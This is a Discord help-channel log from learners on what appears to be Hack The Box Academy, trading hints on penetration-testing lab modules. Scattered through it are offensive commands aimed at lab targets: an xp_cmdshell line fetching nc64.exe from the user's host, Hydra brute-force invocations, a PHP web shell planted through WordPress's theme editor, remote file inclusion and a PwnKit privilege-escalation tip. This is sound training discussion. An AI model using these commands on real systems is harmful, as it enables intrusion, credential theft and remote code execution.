#modules

1 messages ยท Page 515 of 1

lyric inlet
#

Hi

#

New module password attacks is very interesting , but ssh service is very long to brute-force (password mutation)

#

Used given wordlist in ressources

#

same for another service in the same machine

slow venture
#

could anyone give me a nudge on where i can find the ldap password for windows priv esc - skills assessment 1?

rustic sage
#

do you have to restart your vpn every time you jump over to a new box?

half temple
#

so ive been doing the getting started and im on the privilege escalation part i can write to moniter.sh but i keep getting error messages when i go to execute it with sudo would someone help me out cause ive tried to trouble shoot this for a long af time now and even found some videos where they are doing the exact same thing but it just works

west canopy
#

@half temple feel free to DM me ๐Ÿ™‚

slow venture
#

is anyone on who can help me with linux priv esc skills assessment 1

woven copper
urban valley
#

Has anybody completed the Shells/Payload module on Htb Academy?

west canopy
#

@urban valley I have , but I only took notes on maybe the first half ๐Ÿ˜ฆ

frigid summitBOT
#
ahmedt#6748 has been warned

Reason: Mass mention

#
ahmedt#6748 has been warned

Reason: Mass mention

livid pier
#

Anyone finish the wordpress module?

#

@west canopy or @rustic sage you guys have wordpress notes?

lyric inlet
thorn swallow
#

hi i just finished network enumeration with nmap but i dont fully understand a part of it

#

if anyone can help explain it to me that would be great

#

i can privately send you the question as to not spoil the module for other people

#

thank you!

broken saffron
#

Hi everyone i'm doing shells & payloads and I finished all modules and all final skills assessment except the 2n host regarding 50064.rb exploit i'm traying to export that exploit into metasploit but I need root permissions and I don't know if we can import without being root

drowsy flint
#

Hi !
Do you know how long it takes to do the Bug Bounty Hunter module ?

signal topaz
signal topaz
acoustic owl
onyx wasp
#

hi

drowsy flint
lethal atlas
distant cradle
#

Does it happen to someone else that they cannot install crackmapexec in the new module of PASSWORD ATTACKS, section --> Network Services ?

sly nebula
distant cradle
#

doesnยดt work

sly nebula
#

Not even pip3 install?

#

Weird.

distant cradle
# sly nebula Weird.

I have read all the official github documentation and it does not work, the machines must be covered

sly nebula
#

Github? Don't git clone from github. I'd just install the Python module with pip3.

#

Post a screenshot of what you tried.

weary forum
#

Hello, everyone. Is there a good module in HTB that allows me to study gobuster?

#

Or is there a simple module that allows you to use gobuster so that you can learn it? Thanks everyone!!

distant cradle
lethal atlas
jagged zenith
#

Hey

west canopy
livid pier
#

Thank you @west canopy and @lethal atlas ๐Ÿ’š

raven cairn
distant cradle
#

Module--> PASSWORD ATTACKS
Section--> Network Services
I can only connect to the WinRM service with user:john password:november , the others won't let me. And I have used the command--> xfreerdp /v:<target-IP> /u:<username> /p:<password>

distant stream
distant cradle
#

The problem is that it takes a long time to get the passwords, more than 30 min

#

I have used username.list and password.list files inside PW-Attacks.zip

distant stream
distant cradle
#

thanks ill tried it

lyric inlet
#

password mutation is very long (multiples steps)

distant cradle
#

|| Administrator
cassie
chris
dennis
jerome
Public || This are the users but no password found

lyric inlet
#

You must use wordlists from SecLists (like 500 worst passwords)

#

Module is too long to try bruteforce all services

distant cradle
lyric inlet
#

Is sad :/

distant stream
distant cradle
lyric inlet
#

@rustic sage27 I can ou dm too ? ๐Ÿ™‚

distant cradle
#

Maybe it would be good to include a hint that tells you something related to rockyou.txt, in case people get stuck

leaden crest
#

do you like linux?

raven cairn
#

I donโ€™t touch windows

#

FOSS for life

west canopy
#

comedy "mac" option

raven cairn
#

But linux is still better

jagged zenith
#

Now module session security

west canopy
#

@velvet sparrow Wish i could help brother but I have not started that module yet ๐Ÿ˜ฆ

modest moth
#

just finished the Pandora machine on the main website. took me 4 hours lol. i feel so frustrated and relieved.

#

and i leveled up to a skript kiddie

west canopy
#

Nice work dawg!

dry girder
#

Hello, can someone help me with module SHELLS & PAYLOADS on Automating Payloads & Delivery with Metasploit. I can't seem to find the right exploit and gain access to the machine. I feel like i have tried all SMB exploits but can't figure out if i'm doing something wrong or not just overlooking something.

west canopy
#

@dry girder I checked my notes and I was able to use the windows/smb/psexec exploit to complete the section.

#

Also I had to set smbuser and smbpass in the options

dry girder
#

When I use psexec I timeout for some reason and i have set correctly my options

west canopy
#

Hmm... maybe try respawning the target if you haven't already?

dry girder
#

I restarted both the target and workstation and got nothing, but I searched on google and I wrote LHOST to be tun0 and it worked ๐Ÿ™‚

raven cairn
west canopy
#

@dry girder Nice! Yes the LHOST will typically always be the IP address for your Tun0 interface

dry girder
#

Thank you @west canopy gonna keep this in mind if I see this thing happening again.

paper gust
#

if you are still having trouble with this, let me know

raven cairn
#

@west canopy Do you use cherrytree for notes?

#

I need to start taking more notes, and I was wondering what I should use.

west canopy
#

When i work on live boxes I use cherry Tree. For academy modules i just make a google doc and use Windows Snipping Tool for screenshots

raven cairn
#

Can I sync my notes across devices?

#

with cherry tree at least

west canopy
#

I'm not sure , don't think so but i could be wrong

#

i don't think it works like OneNote or anything like that

raven cairn
#

I am going to try to take more notes.

#

We will see how it goes. lovethebox

fathom bay
#

i use notion, its pretty good and its free

#

cant be bothered to spend money unless its games xd

shadow mist
#

Intro to network traffic analysis

  • Interrogating Network Traffic With Capture and Display Filters

Should it be a file โ€œTCPDump-lab-2.zipโ€ to download? I didnโ€™t found any file on that page

rustic sage
#

Hi there!

I think that the "Packet Inception, Dissecting Network Traffic With Wireshark" lab of the HTB Academy module "Intro to Network Traffic Analysis" is broken! When sniffing on 10.129.43.4, there are no jfif files on HTTP, there's just a "flat.jpeg" file on FTP. So, I can wait and wait and wait, no HTTP JPG files. Thus, I cannot answer the question "What was the filename of the image that contained a certain Transformer Leader? (name.filetype)" with hint "You should have seen three image files pulled in the traffic. water.jpg, htb.jpeg, and ..?". Has anybody similar problems?

velvet sparrow
#

can someone help me with Password Attacks Lab - Medium I found the user j......... and the pass but when I try SSH with the user it won't connect

patent maple
#

Hello
Im trying to pwn the ARCHETYPE machine in Tier 1 of HTB
I managed to connect to the SQL server and configure the xp_cmdshell
I printed working directory to see if it was working, and it did
But I keep having issues when I run this particular command: xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://{MY_IP}/nc.exe/nc64.exe -outfile nc64.exe"
I keep getting an error saying so such command as wget
How do I fix this?

velvet sparrow
velvet sparrow
west canopy
#

@shadow mist Try checking under the "Resources" section of the module

paper crag
#

Password Attacks - Mutation section...drawing a blank...any hints?

#

Ignore that...I literally just found what I need...but it took and hour...

west canopy
#

@rustic sage Try using the Wireshark-lab-2.pcap file provided under Resources. You should be able find the solution by exporting objects from the pcap.

#

@patent maple I think wget in powershell is an alias and might not be a native command. Maybe try using "Invoke-WebRequest"

lethal atlas
jagged zenith
#

Any hint

#

BROKEN AUTHENTICATION

acoustic owl
#

look at the token that is generated.
Then write a script that creates tokens in the same style and bruteforce the web application with it.

acoustic owl
raven cairn
#

Need some help with the XSS skills assesment.

#

One thing I am having trouble in with this module is that I am confused how to find XSS vulnerabilities.

#

I don't know if I should be using tools, doing code review or just brute forcing different payloads until one works.

west canopy
#

@raven cairn you are basically just re-doing what you did in the Session Hijacking portion. Using different payload formats to find out which parameter is vulnarable

raven cairn
#

๐Ÿ‘ Thanks. I will try hard to finish this question, and if I am having trouble I will come back

raven cairn
#

@west canopy My flag is not working (or i might be wrong). Can i dm to double check if U have the right cookie?

west canopy
#

sure

urban valley
#

Hi, can someone help me with the "Username Brute Force" section of the Login Brute Forcing module? The question is "Try running the same exercise on the question from the previous section, to learn how to brute force for users." Can't seem to get it to work

raven cairn
#

Ayoooo thanks Jared.

west canopy
#

@urban valley The answer is the same as the question on the previous section. Just instead of using a Combined Credentials Wordlist, you will supply the password and then use a wordlist for Usernames.

fast timber
#

Can anyone give any hint on skill assessements of command injection?

#

Hey guys

west canopy
#

@fast timber Notice how you can either Copy or Move a file to the TMP directory. The injection point is related to that ๐Ÿ™‚

urban valley
urban valley
# west canopy <@!266018107120680960> The answer is the same as the question on the previous se...

Could you also give me a hint/tip for Skill Assessment- Service Login Part 2? " Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag." I got into the SSH and I'm trying to brute force ftp into the other user. But I don't know if im using the correct port. I'm using the given syntax they gave: netstat -antp | grep -i, to find my ports on the ssh server

west canopy
#

@urban valley You will want to run Hydra from inside the target. There should be a certain rockyou.txt file there. Try running hydra against the loopback IP address

urban valley
west canopy
#

@urban valley DM me ๐Ÿ™‚

white moss
#

Anyone working on the Bash Script Mod?

#

need some help

stark tapir
#

Module: Footprinting
Task: Lab -Easy
Question: How can i copy generated rsa keys to server?

feral gyro
#

might work

west canopy
#

@stark tapir the command from within the ftp server would be something like: get id_rsa (this will transfer the key from the ftp server to your machine)

woven copper
onyx wasp
#

y it's not working ??

#

hello anyone ???

west canopy
#

@onyx wasp your bottom screenshot should be correct. Maybe try refreshing the page?

onyx wasp
#

lol i get the solution

jagged zenith
#

Any hint

jaunty patrol
#

I am stuck on

Hybrid Mode```
Would be happy to get some help
sly nebula
#

In PASSWORD ATTACKS - Password Mutations, is it normal to spend more than two hours on the assessment?

frozen sentinel
#

Anyone available for a nudge on getting Drupalgeddon3 to work on the Attacking Common CMS module?

paper crag
sly nebula
#

That's what I am actually trying to do. The exercise statement is a bit misleading, though (it doesn't mention you have to reduce, it kinda takes it for granted).

paper crag
#

Yeah i found that...enumerate more (with techniques NOT in the Password Attacks module)...there is only a very limited number of users on there, and there's a password policy, which should allow you to reduce the size of the lists considerably...

fast timber
regal sierra
#

Hello! I am working through the Network Enumeration with NMAP module on the Firewall and IDS/IPS Evasion - Medium Lab section. I cannot get the DNS server version, can someone help me please?

west canopy
#

@regal sierra DM me if you still need help

#

@jaunty patrol feel free to DM me as well

livid pier
late beacon
#

Can someone help with this question for File Inclusion?

#

Can't read /usr/share/flags/flag.txt for some reason

late beacon
#

Can anyone help?

#

Is this module broken or something?

west canopy
#

@late beacon I just tested on my end, I'm not able to read the flag either

late beacon
late beacon
west canopy
#

Yep, I have screenshots in my notes for what I did to solve each section. Tried to recreate them and could not get the flag. I was able to read /etc/passwd though.

late beacon
#

Must be some new changes that broke this section of it. I was able to read /etc/passwd as well. Perhaps you could DM me the flag value? I know how to get it, it's just not working.

distant cradle
#

Any clue for ๐Ÿค” Module--> PASSWORD ATTACKS
Section--> Credential Hunting in Linux

late beacon
patent blaze
#

Can anybody help me with the third question from OSINT module, section Active Subdomain Enumeration ???

west canopy
#

Has anybody done Secure Sessions skills assessment? I'm really not sure what I'm supposed to be doing. The API endpoint looks to be vulnerable to RFI, and a successful query shows "adminVistedTrue", but the auth-session cookie is the same as if I just log in to the site as a regular user.

urban valley
#

anyone completed "Information Gathering - Web Edition" ? I'm stuck on the first question of the "Active Subdomain Enumeration:" section. When I enter "inalnefreight.htb" on hackertarget.com/zone-transfer/, I get "error check your api query"

late beacon
#

Looks like the whole academy is broken rn

urban valley
#

i had the same issue with the question yesterday though :/

late beacon
#

Did you complete the File Inclusions module?

west canopy
#

@urban valley try doing something like: dig axfr inlanefreight.htb @ipaddress

urban valley
frigid quail
#

Hello guys i'm on Linux File Transfer Methods , trying to download the flag.txt file with python but i get connection refused even the url(port 80) is 403 Forbidden ,can anyone help ?

west canopy
#

@frigid quail Can you send a screenshot so I can see what's happening?

urban valley
#

@late beacon hey daniel i remember now how to get that flag, can you DM me

rustic sage
#

can someone help me with 'web request' HTTP method GET section its literally the beginner module but I need assistance

west canopy
#

@rustic sage DM me ๐Ÿ™‚

white moss
#

Looking for help on the Bash Scripting Module. Has anyone who is online finished it?

mortal basin
white moss
#

Trying to figure out if the problem I am having with the solution to the "Comparison Operators" section's final question lay in my script or if it is in my understanding of what is being requested in the first place.

devout galleon
#

Working on Other PHP Wrappers and getting commands to run but cant figure out the question. It literally says "Submit the contents of the flag.txt file located in the /secrets directory" That looks like it is asking for the secret directory in the root directory which does not seem to exist. Anyone know what I am missing been trying to find a flag.txt file to no avail

mortal basin
devout galleon
mortal basin
#

No.. the question has been clarified

devout galleon
mortal basin
#

That was the issue.. it's fixed now

devout galleon
idle cliff
#

Hey guys - encoutered a problem with proxychains, any advice? it says invalid item in proxylist section: https 127.0.0.1 8080

#

Here is a screenshot of what I'm getting

rustic sage
raven cairn
#

@rustic sage You awake? I might need some help lol.

#

Login Brute forcing, username brute force

#

I have trouble understanding instructions

west canopy
#

It's the same answer as the previous section but instead of using -C with a combination user:pass wordlist, you will do -L for a username list and -p with a password

#

so it would be something like: hydra -L /opt/useful/SecLists/Usernames/Names/usernames.txt -p admin -u -f 178.35.49.134 -s 32901 http-get /

raven cairn
#

Ok ok let me try this out. I understand how to use Hydra but understanding instructions. I'll let you know how it goes.

#

Also how you doin Vivi and Jared? : D

west canopy
#

I can't figure out what to do on this Session Security Skills Assessment so my jimmies are a bit rustled

raven cairn
#

If I did that section I would help you out ๐Ÿ˜…

#

One day I will have enough modules under my belt to do so

#

lovethebox Thank you guys.lovethebox Was finally able to solve it.

west canopy
#

@frozen sentinel let me know if you still need help with Attacking Common Applications. I don't recall using that exploit specifically but I can check my notes

livid pier
west canopy
#

Carry me Vivi โค๏ธ

velvet sparrow
#

can someone help me with PASSWORD ATTACKS module Skills Assessment I'm struggling for 3 days on this, the module is design to struggling not to learn about Password Attacks

raven cairn
#

Login brute forcing - Section log in attacks. I am confused what is wrong with my command.

#

hydra -l admin -P home/rockyou.txt -f 178.62.21.52 -s 32381 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

#

I have the right ip and port. Am I not supposed to use rockyou???

west canopy
#

@raven cairn rockyou should work through out this whole module. Your command looks right

raven cairn
#

Hmmmmm It's not working. I am connected to the vpn and the ip/port looks is right

west canopy
#

Service Login right?

livid pier
#

@west canopy is the submit-solution page supposed to be broken?

west canopy
#

@livid pier No it looks like it's an API endpoint

#

but vulnerable to RFI. Like if you have a netcat listener running you can make it connect to you

#

@raven cairn maybe the docker target didn't spawn properly?

#

submit-solution page by itself

#

submit-solution page trying to reach "evil.txt" file hosted on my machine

#

I tried using wireshark to sniff packets, I can get an auth-session cookie but it's identical to the cookie I get when I just navigate to the login page

livid pier
#

admin visited

#

this is the way

raven cairn
#

I don't mean to interrupt but Hydra is being weird. Here is my error on Kali. I am trying to do this on my pwnbox but it is taking forever. I wonder if resetting the docker target might work? I've heard there have been some docker issues today.

stoic turtle
#

hi guyss

livid pier
raven cairn
#

Sup @stoic turtle

stoic turtle
# livid pier hi

i lowkey dont know how to hack or anything about code,Do i learn here??

raven cairn
#

Wondering what my next course of action should be....

#

This is what I get on the pwnbox

west canopy
#

sec i'll try it on my end

#

@livid pier dang did you solve it already?

livid pier
#

Im toying with the idea of getting a shell

west canopy
#

@raven cairn just tested on my end with my Kali VM , i was able to crack the password in a few seconds

raven cairn
#

Weird!? Did you use the same commands that I did?

west canopy
#

yep

livid pier
west canopy
#

The sad emoji definitely hits home

livid pier
#

I feel like it does hit my core

stark tapir
#

Hello!
Module: Footprint
Task: Medium Lab
Question: can't find any way to go into server. I need credentials for every service. Any nudge?

stark tapir
raven cairn
#

I was able to get in, but now I get this when I log into the admin portal.

west canopy
#

@stark tapir try mounting the NFS share and enumerate the files inside of it to find credentials

raven cairn
#

Resetting the machines worked : D

west canopy
#

@raven cairn that almost looks like its a network or firewall issue on your end

stark tapir
west canopy
#

just regular mount, if you follow the steps in the NFS section you should be able to mount the NFS share. There are a ton of .txt files inside

stark tapir
#

cd nfs
bash: cd: nfs: Permission denied

#

SUDO

#

ahahah

#

thx bro! you saved me again!

west canopy
#

alright boys i'm gonna crash, see ya'll later!

raven cairn
#

And this is on the pwnbox

#

It's extremely frustrating when you do everything right on your end and you can't get the flag

livid pier
#

Its one thing for something to not work and know it should be working

#

Its another when you are like oh i guess i was wrong

#

I guess I will try something else

#

then waste 2 days trying other things when the first thing you tried and failed was actually the answer

raven cairn
#

@mortal basin Are the issues I am experiencing possibly on HTB's end?

#

Specifically not being able to get to the login page.

#

The other errors were probably problems on my end, but I don't see why I keep getting timed out when I try to connect to the machine's login page on the pwnbox

mortal basin
#

Nothing of the sort has been reported. If you are having difficulty logging in try contacting the help team

raven cairn
#

๐Ÿ‘ @mortal basin

#

I was able to get the flag.

jagged zenith
#

Please any hint

limber dust
#

Hello everyone, I am currently doing "Windows Fundamentals" HTB Academy. Can anyone help me with some of the steps? I would like to understand this. It's about shared folders, basic NTFS and creating users.

#

My actual task: "User must change password at logon"
I found out that I was for it:
Set-ADUser -Identity <samAccountName> -ChangePasswordAtLogon $true.
Then I get this error message:

#

I don't know what to do here =/

mortal basin
#

@here as you may have guessed from the discussion above, the File Inclusion module is due for an update, so it will be taken down for ~30 minutes..
will let you know once it's updated

unique valve
mortal basin
#

@here File Inclusion module update released, with 4x the content and several new sections and exercises..
anyone who has previously completed the module is strongly recommended to go through it again ๐Ÿ™‚

vernal dagger
#

!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
var=$(echo $var | base64)

    if [[ $var == $value ]] && [ ${#var} -ge 113469 ]  ;
     then
            echo $var | tail -c 20

     else
             echo "Not Found"
   fi

done

#

Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,469 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.

#

what do

kind turret
#

@vernal dagger Try

-eq 113469
vernal dagger
#

it elsed

#

gt did not do the job either

kind turret
#

Ok, try:
||if[[ "$var" =~ "$value" && ${#var} -eq 113469 ]]||

vernal dagger
#

worked

#

thank you !

kind turret
#

Welcome ๐Ÿ’ฏ

vernal dagger
#

let me try to get sense out of this

#

so =~

kind turret
#

Checks for substring

vernal dagger
#

oh wow

#

cool!!

#

im pleased thank you bro

kind turret
kindred prism
#

Hello, I have a strange question. Are you not able to use the HTB vpn (non-subscriber status at the moment) to connect to use your own Kali or Parrot OS to complete the module questions? The reason I am asking is nmap never works (other tools do work) - example sudo nmap -sC -sV 165.227.238.95:32236 which returns no target provided?

kind turret
#

@kindred prism You don't specify ports in Nmap like that. Try:

nmap -sC -sV -p 32235 165.227.238.95
kindred prism
lethal atlas
late beacon
#

"Blacklist Filter" section of the File Uploads module has a problem that isn't working for me. Even when I upload a file that has an allowed extension I cannot execute code on the backend server

#

Would appreciate if someone can test this out

kindred prism
lethal atlas
#

sudo nmap -sC -sV -p 30383 178.128.163.152 will only scan port 30383 if you want to scan the whole system you need to use sudo nmap -sC -sV -p- -Pn 178.128.163.152

lethal atlas
patent blaze
#

Can anybody help me with the third question from OSINT module, section Active Subdomain Enumeration ???

distant cradle
#

Some help i have the hash || $y$j9T$Xu.Vo5nnA8DZZ.getcrCR.$SkF9OfpfuRNy7nim2hXCwRj/99pWRVsRPEbqntEdU83 || from the root but i cant crack it

lethal atlas
distant cradle
#

PASSWORD ATTACKS

#

Section Passwd, Shadow & Opasswd

lethal atlas
#

I hear some of the hashes take forever to crack though

distant cradle
distant cradle
lethal atlas
kindred prism
patent blaze
lethal atlas
#

3rd question? DM me

distant cradle
lethal atlas
halcyon copper
#

Hi, when i ssh to the given adress, the password i feel is not recongnized. Any help with the ssh command please ?

livid pier
sharp citrus
#

Hello everyone , I would like your assistant in something simple , Im taking the HTB academy , and in the topic of " Active Infrastructure Identification " for the information , it asking the question " Which CMS is used on app.inlanefreight.local? " Ive been trying to solution, and I have whatweb , but im not sure how to find it

#

INFORMATION GATHERING - WEB EDITION

sharp citrus
#

I did

#

but I get bunch of CMS

livid pier
steel summit
#

hi! im on linux fundamentals. Can someone help me if in there is in the machine the service that request me? I'm in services a process management and they want to use systemctl to find the service with the help of grep command if its necessary but i think it doesn't exist in the machine because nothing match it except one similar service but not the correct

livid pier
sharp citrus
halcyon copper
# livid pier ssh user@ip ?

SSH to 10.129.146.57 with user "htb-student" and password "HTB_@cademy_stdnt!". The password is not recongnized

livid pier
#

ssh htb-student@10.129.146.75

#

that is your command?

livid pier
halcyon copper
livid pier
#

Get kali and never run out of session time again ๐Ÿ˜‰

paper crag
#

OK has anyone actually succeeded on the Password Attacks Module...mutation section challenge and got the correct flag?

sharp citrus
#

aby suggestions

livid pier
sharp citrus
#

/yeah

#

and : whatweb ip -v

twin gulch
#

Guys any help in the new password attacks module?

jagged zenith
#

Hey i need help me

lethal atlas
#

whats up?

livid pier
#

@west canopy Still stuck?

west canopy
#

Yep

livid pier
#

lol me too

west canopy
#

I moved onto the updated LFI module haha

unique valve
#

An issue affecting the answer submissions in Password Attacks Skills Assessments has been fixed. If you were experiencing issues with this, please test this on your end and let us know the result.

livid pier
#

@west canopy

urban valley
#

On "hacking wordpress" module for the RCE via Theme Editor section, I added a web shell via the theme editor (system($_GET['cmd'];) but when I go to my append URL (
http://139.59.174.208:32653/wp-content/themes/twentyseventeen/404.php?cmd=id) i get this error: Fatal error: Uncaught Error: Call to undefined function get_header() in /usr/src/wordpress/wp-content/themes/twentyseventeen/404.php:14 Stack trace: #0 {main} thrown in /usr/src/wordpress/wp-content/themes/twentyseventeen/404.php on line 14

kind turret
#

<?php ?> have you added that part @urban valley

west canopy
#

@urban valley does your template look like this?

twin gulch
#

Can someone help me in a module?

west canopy
#

Possibly, what's up?

twin gulch
west canopy
#

Ah shoot. I haven't started that module yet ๐Ÿ˜ฆ

twin gulch
#

Lol running with different pass lists with no success

west canopy
#

What happens if you use curl?

urban valley
west canopy
#

Looks like it's working

#

try doing cmd=ls

urban valley
west canopy
#

you would want to url encode the entire command

#

cmd=<encoded command>

#

404.php?cmd=<encoded command>

urban valley
west canopy
#

well the command would be: cat README.txt

#

so you would url encode that

#

if you wanted to cat /etc/passwd it would look like: cat%20%2Fetc%2Fpasswd

civic wave
#

yo wassup you guys

#

I'm in knowledge check section of getting started module and i've gotten user.txt which is the first task

#

but now i need to escalate privilege to do the second task and I don't know a way I can do so in meterpreter because most commands aren't working while in meterpreter

#

so if one of you could maybe be give me a hint on what i'm supposed to do

#

i'd appreciate it

#

pls

west canopy
#

if you type "shell" into meterpreter it will drop you into a regular system shell

#

i pretty much always do this because I am not super proficient with meterpreter's commands

civic wave
#

daaaaaaaaaaaaaaaaaaaaamn

#

thanks

west canopy
#

For the Priv Esc --- try using the ly4k PwnKit from github

idle cliff
# rustic sage

Sorry I'm brand new and trying to figure everything out. What am I missing here?

paper crag
lethal atlas
raven cairn
#

Uggg. The login-brute forcing module is being so weird to me.

#

Login Brute Forcing: Service Authentication Brute forcing ;

#

I don't see why my command is wrong

#

hydra -l b.gates -P /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -u -f ssh://178.128.163.152:32703 -t 4

#

I also tried using rockyou.txt and rockyou-10.txt and those wordlists didn't work for me either

#

I always get stuck in these stupid little ruts, even if I completely understand the concepts.

kind turret
#

You are using the wrong password list

#

Try to use CuPP

raven cairn
#

๐Ÿ‘ That is a good idea. I will try that and I will report back with my findings.

lethal atlas
#

@kind turret is correct, that password list was for a previous question. for this question you need to create a username list and a password list.

raven cairn
lethal atlas
#

I believe when I first completed the module it did not give you the b.gates. So you can skip the username generator part for this question

#

but you do have to us cupp to make a password list.

#

Ironically I am stuck on the Default Credentials section of Broken Authentication. Cant find a form name and get an error with the python file.

#

Well, got the python file to run. Progress.

raven cairn
#

It's been taking me a while to crack the password still.... ๐Ÿค”

lethal atlas
#

did you create a password list file using cupp?

raven cairn
#

I used username anarchy to generate username wordlists so that might be what I am doing wrong?

lethal atlas
#

did you select all the extra stuff while creating it?

#

extra characters, l33t etc

raven cairn
#

Just did

lethal atlas
#

$ cupp -i


cupp.py! # Common
\ # User
\ ,, # Passwords
\ (oo)____ # Profiler
(
) )
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]

[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ๐Ÿ˜‰

First Name: William
Surname: Gates
Nickname: Bill
Birthdate (DDMMYYYY): 28101955

Partners) name: Melinda
Partners) nickname: Ann
Partners) birthdate (DDMMYYYY): 15081964

Child's name: Jennifer
Child's nickname: Jenn
Child's birthdate (DDMMYYYY): 26041996

Pet's name: Nila
Company name: Microsoft

Do you want to add some key words about the victim? Y/[N]: Phoebe,Rory
Do you want to add special chars at the end of words? Y/[N]: y
Do you want to add some random numbers at the end of words? Y/[N]:y
Leet mode? (i.e. leet = 1337) Y/[N]: y

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to william.txt, counting 43368 words.
[+] Now load your pistolero with william.txt and shoot! Good luck!

And as a result, we get our personalized password wordlist saved as william.txt.

raven cairn
#

๐Ÿ‘ I was able to get the password.

lethal atlas
#

nice.

raven cairn
#

Forgot to do this:

#

sed -ri '/^.{,7}$/d' william.txt # remove shorter than 8
sed -ri '/[!-/:-@[-`{-~]+/!d' william.txt # remove no special chars
sed -ri '/[0-9]+/!d' william.txt # remove no numbers

lethal atlas
#

yeah that makes a difference.

raven cairn
#

Oh my fricking gosh

#

I cannot login

#

The contents of this module are super easy

white moss
#

Hey yall. If anyone has completed the Bash Scripting Module, I have kind of hit a wall and could use some help. Feel free to DM me, if the shoe fits.

raven cairn
#

I have the password. But I can't ssh into the machine for the life of me

#

It won't ask me to input the password

west canopy
#

I will try it on my end

raven cairn
#

I just contacted HTB support and they have not answered me and I have been waiting for a bit

raven cairn
west canopy
#

maybe try using sudo?

#

i tested on my VM and it seems to be working

raven cairn
#

Yep. No luck with Sudo. and HTB support team has not answered me for ~25 minutes.

west canopy
#

ill try it from pwnbox too

#

one sec

#

@raven cairn This might sound silly but maybe try restarting your router? The other day you were having some weird issues that looked to be network or firewall related

raven cairn
#

Honestly tho. I might. I have been stuck on this ONE problem for about 3 hours now. ๐Ÿ˜ญ

livid pier
west canopy
#

Anyone able to give me a nudge on File Inclusion "Basic Bypasses" ? I've tried combining several techniques but none have been successful

Edit: Solved!

ashen orbit
#

I'm going through web proxies and I installed zap and they are asking me to hit the hud button, but the hud never shows?

west canopy
#

@ashen orbit In order to see the HUD i had to use Zap's built in browser

ashen orbit
#

I'm using it, keep refreshing but nothing happens

jolly sonnet
#

Anybody think they can help me out with the web request module, GET section question?

west canopy
#

@jolly sonnet you will want to curl the target using "search.php?search=flag" as part of the URL, along with the Auth token you got from logging in as admin:admin

jolly sonnet
#

I havent gotten to that point yet, I'm trying to observe the backend response between the target server and whatever site its getting its info from using the network tab, but the php request on the backend wont show like it does in the module example

#

This is the example given, everytime I type anything into the search engine located on the target machine, it repeats the initial connection request sequence (http://admin:admin@<ip-address>:<port-num>/)

west canopy
#

Seems to be OK on my end. I did a search for "Leeds" and I see the GET request pop up when viewing the requests under "Network".

jolly sonnet
#

Weird. How are you accessing the HTB academy platform? I'm just doing it through chrome on my host OS, should I be doing it another way perhaps?

west canopy
#

That could definitely be it, they are using firefox in all of the examples. I am using a Kali Linux VM with Firefox.

jolly sonnet
#

okay awesome that will probably fix it. I'll start doing it in my kali vm from now on, thanks!

ashen orbit
#

Fuck it not using the hud

west canopy
#

@ashen orbit might be a dumb question but do you have the HUD turned on? It's the icon in the top right , next to the firefox icon

ashen orbit
#

Yeah, its on, you have an older version than me, maybe thats the issue, I'm on 2.11.1

west canopy
#

If this is for the ZAP scanner section , I was able to complete it without using the HUD

raven cairn
#

Fyi I was able to fix my issues ๐Ÿ™Œ๐Ÿป Patience is key. I am going to finish the pentesting path eventually.

ashen orbit
#

I always say I'm going to spend two hours practicing, then play video games, but then it turns into all night

west canopy
#

@raven cairn were you able to SSH? what was the issue?

raven cairn
west canopy
#

@livid pier Holy sh*t dawg I solved it!

#

oh my god this is like dopamine overload

raven cairn
#

Good job!!!

livid pier
ancient phoenix
#

Hello

#

I use kali with remote desktop connection from windows using xrdp wsl2. I have ubuntu on windows do I need to download ubuntu on kali again?

unreal sorrel
#

hello

#

any idea on how to get sudo access to a pwnbox in academy?

#

i was trying to follow along on the xss course and i need to start a listening server on a port (either netscan or a php server), but i need sudo access to start it

distant cradle
unreal sorrel
#

oh, ok, thanks

unreal sorrel
#

Did anybody finish the xss module recently? i may have an issue and I do not know how to fix it

low vine
#

Dont want the answer, on the "Getting Started : Knowledge Check"
I've random guessed the login 1st try but have been stuck for about 3 hours now trying to figure out a way to exploit this / move to where I need to go. I've used FFUF to find 5 diff extensions i can visit and have found agood amount of what seems to be relevant info from there.

Api Key / Username and Password as well as other stuff.

#

would like a little nudge /better understanding of what i'm possibly missing if possible.

#

I see an upload page that doesnt seem to load which is where i thought i'd be able kinda get access, but kinda flailing / stuck atm

#

was there another way i was supposed to get / find initial access? Other then guess a standard credential thing?

valid finch
#

stuck on knowledge check bit of getting started on the part with

#

||using php to priv esc I know I need to use php I been on gtfobins I tried my own php code the server is running php 7.4.3 and just keeps echoing my commands||

jagged zenith
#

any hint BROKEN AUTHENTICATION skill

kindred prism
#

Hi, looking for some assistance with Getting Started --> Prvilege Escalation --> second question requires privilege escalation to root but I can't seem to get it. I have tried various GTFOBins with no success.

raven cairn
west canopy
#

@low vine For foothold you can use a metasploit exploit against the GetSimple CMS being used by the Target

#

@kindred prism DM me if you still need help with the priv esc ๐Ÿ™‚

#

@valid finch Feel free to DM me as well

valid finch
lyric inlet
#

Hi all

#

I have one question about hard module skills assessment on passwords attacks

elder pendant
#

RESOLVED (Thank you @unique valve ): I am getting discouraged using this platform for my cyber security journey. I am putting the right answer for modules and for some reason my answers are incorrect. Is there anyway I can share a screenshot to give an idea of what I am talking about?

rustic sage
#

Hello, I'm getting an error while doing the RDP in the windows fundamentals, I've followed all the instructions to do the modules from my own terminal but I'm getting an error while trying to connect to target in the RDP section, "errorconnect_connect_transportfailed"

rustic sage
idle cliff
rustic sage
#

So, even for HTTPS, it would be an HTTP server.

#

You can google a bit "Socket vs HTTP" @idle cliff

unique valve
idle cliff
unique valve
#

It wasnt. I was replying to professor101.

compact compass
#

@rustic sage May i ask you a q regarding the Footprinting module in htbA--specifically the DNS section...its a dumb q but I cant figure it out!

compact compass
#

ok

#

